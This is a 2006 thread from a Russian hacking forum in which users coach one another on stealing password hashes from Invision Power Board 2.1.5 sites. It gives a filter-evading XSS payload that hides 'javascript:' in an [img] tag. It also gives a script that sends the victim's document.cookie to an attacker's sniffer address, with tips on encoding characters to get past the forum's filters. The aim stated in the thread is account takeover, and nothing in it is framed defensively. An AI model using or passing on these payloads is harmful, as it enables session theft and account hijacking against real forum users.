ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Invision 2.1.5 Xss
  #1  
Старый 09.04.2006, 12:37
Аватар для sexxx
sexxx
Новичок
Регистрация: 03.04.2006
Сообщений: 8
Провел на форуме:
17441

Репутация: 0
По умолчанию Invision 2.1.5 Xss

Вобшем как можно унать хэш на это версии движка,
помню можно было через "жалобу" но вот работает ли эта шняга на этой версии не знаю, знал бы не спрашивал.
 
Ответить с цитированием

  #2  
Старый 09.04.2006, 12:40
Аватар для GreenBear
GreenBear
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
Провел на форуме:
19975136

Репутация: 4536


Отправить сообщение для GreenBear с помощью ICQ
По умолчанию

Цитата:
помню можно было через "жалобу" но вот работает ли эта шняга на этой версии не знаю, знал бы не спрашивал.
а попробовать? не работает.
 
Ответить с цитированием

  #3  
Старый 09.04.2006, 12:53
Аватар для iNcluDe
iNcluDe
Новичок
Регистрация: 07.03.2006
Сообщений: 18
Провел на форуме:
50877

Репутация: 3
По умолчанию

Xss баг через репорт в 2.1.5 исправлен, он для 2.1.4
 
Ответить с цитированием

  #4  
Старый 09.04.2006, 13:52
Аватар для sexxx
sexxx
Новичок
Регистрация: 03.04.2006
Сообщений: 8
Провел на форуме:
17441

Репутация: 0
По умолчанию

Спасибо буду знать, а не подскажете как нибудь там можно сваравать хэш, может сплойт есть. Знаю что гугл рулит, но всё так преятней узнать от знающих людей. ПРобывал сам поискать чтоб хэш cтырить, но что то не выходит.
 
Ответить с цитированием

  #5  
Старый 09.04.2006, 14:22
Аватар для member_ru
member_ru
Познающий
Регистрация: 08.12.2005
Сообщений: 59
Провел на форуме:
39531

Репутация: 5
Отправить сообщение для member_ru с помощью ICQ
По умолчанию

sexxx, никак, пока XSSбаги там не нашли.
 
Ответить с цитированием

  #6  
Старый 09.04.2006, 15:30
Аватар для Otaku
Otaku
Познавший АНТИЧАТ
Регистрация: 24.07.2005
Сообщений: 1,057
Провел на форуме:
1864132

Репутация: 116


По умолчанию

Пока ничего такого нет. Версия ещё девственная. В смысле не поимел пока никто.
Можно через аватарку попробовать вроде бы. Но это только под Ie.
 
Ответить с цитированием

  #7  
Старый 09.04.2006, 20:49
Аватар для CinerX
CinerX
Познающий
Регистрация: 13.02.2006
Сообщений: 82
Провел на форуме:
539650

Репутация: 37
По умолчанию

вместо пробелов в слове javascript надо поставить табулюцию. Работает под Ие и опера

[img]j a v a s c r i p t:alert(/XSS/).jpg[/img]
 
Ответить с цитированием

  #8  
Старый 09.04.2006, 21:47
Аватар для Noth!nG
Noth!nG
Познающий
Регистрация: 08.03.2006
Сообщений: 32
Провел на форуме:
94148

Репутация: 10
Отправить сообщение для Noth!nG с помощью ICQ
По умолчанию

Invision Power Board 2.1.5 до 2006-03-08 и версии до 2.1.x

Наличие эксплоита: Нет

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение.

Уязвимость существует из-за недостаточной обработки входных данных в модуле PM. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.

P.S.: В инете искать пробовали?
 
Ответить с цитированием

  #9  
Старый 09.04.2006, 21:56
Аватар для 1SeTh
1SeTh
Участник форума
Регистрация: 17.02.2006
Сообщений: 189
Провел на форуме:
2406659

Репутация: 34
По умолчанию

Цитата:
Сообщение от CinerX  
вместо пробелов в слове javascript надо поставить табулюцию. Работает под Ие и опера

[img]j a v a s c r i p t:alert(/XSS/).jpg[/img]
Работает спасибо ))
а теперь после того как получил алерт что мне делать?
заранее спасибо
 
Ответить с цитированием

  #10  
Старый 10.04.2006, 01:38
Аватар для CinerX
CinerX
Познающий
Регистрация: 13.02.2006
Сообщений: 82
Провел на форуме:
539650

Репутация: 37
По умолчанию

тебе ввобщем надо получить куки припомощи JavaScript.
вот пример:

<script>
img = new Image();
img.src = "http://адресс_снифера?"+document.cookie;
</script>

только теперь тебе это надо вставить в ту XSS. Скажу сразу что форум не воспринимает ",?,;, пробел. Тебе эти символы надо зашифровать с помощью http://ha.ckers.org/xss.html и немного до делать сам скрипт возможно =)
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss для новичков Micr0b Уязвимости 0 04.06.2006 18:25
Invision 1.3 Xss ? slider Форумы 6 01.06.2006 13:01
Уязвимость Invision Power Board 2.1.5 Go0o$E Форумы 106 05.05.2006 21:35
Active XSS in Invision Power Board 2.1.4 k00p3r Уязвимости 8 03.03.2006 20:51
Вопрос по использованию XSS на Powered by Invision Power Board(U) v1.3 Final rsha1988 Форумы 12 15.02.2005 01:44



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ